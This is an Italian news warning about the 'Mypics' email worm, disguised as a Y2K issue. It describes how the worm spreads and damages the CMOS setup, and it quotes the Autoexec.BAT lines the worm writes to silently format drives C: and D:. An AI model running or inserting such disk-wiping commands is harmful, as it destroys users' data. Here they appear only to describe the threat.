Web (internet) – L’allarme è partito nelle scorse ore da Computer Associates che, con Symantec, ha avvertito della diffusione sulla rete di “Mypics”, nuovo virus altamente distruttivo in grado di produrre danni pesantissimi agli utenti che ne saranno infettati. I laboratori AVERT di Network Associates e quelli delle altre aziende specializzate classificano Mypics come un virus a rischio medio poiché la sua diffusione non è ancora elevata.
Pare che Mypics si nasconda fingendosi un problema legato ad Anno2000. Soltanto un “travestimento”, però, per poter poi riformattare i dischi rigidi sul computer dell’utente, con la conseguente cancellazione dei dati, e il reindirizzamento del browser su pagine a contenuto adulto.
Si tratta di un Worm (Worm.Mypic, W32/Mypics.worm) che si autoinvia attraverso la posta elettronica in un attachment, da non aprire, che si chiama “Pics4You.exe”. Attachment di un messaggio nel quale è scritto: “here some pictures for you!”. Si tratta di un eseguibile che, se viene lanciato, si inserisce nella memoria di sistema e si allega a messaggi inviati segretamente ai primi 50 indirizzi che trova nella rubrica del sistema colpito. Pare che ad essere colpiti siano tutti i sistemi Windows.
Il funzionamento è complesso: il prossimo primo gennaio il virus che rimane “in macchina” genera un file sotto C che si chiama CBIOS.COM, un file che riscriverà le informazioni di “checksum” nel CMOS, ovvero nell’informazione di setup del BIOS, cioè del computer. Questo produce un messaggio di errore “CMOS checksum is invalid” non appena l’utente cerca di riavviare il sistema. A quel punto, non appena la macchina viene riavviata con successo, il worm tenta di formattare i dischi C e D.
L’eseguibile è scritto in Visual Basic è si basa sulla libreria MSVBM50.DLL senza la quale è destinato a dare errore. Se invece “gira bene” sovrascrive il file Autoexec.BAT con queste istruzioni:
ctty nul
format d: /autotest /q /u
format c: /autotest /q /u
c:cbios.com
E subito dopo rimpiazza la home page di Internet Explorer con questo indirizzo
http://www.geocities.com/SiliconValley/Vista/8279/index.html .
La soluzione, anche in vista dei numerosi virus che gli esperti si attendono per le prossime settimane, è quella di dotarsi dei più aggiornati software di protezione e di scaricare spesso gli aggiornamenti via via prodotti. In assoluto, comunque, gli attachment che arrivano non richiesti sono sempre da guardare con sospetto?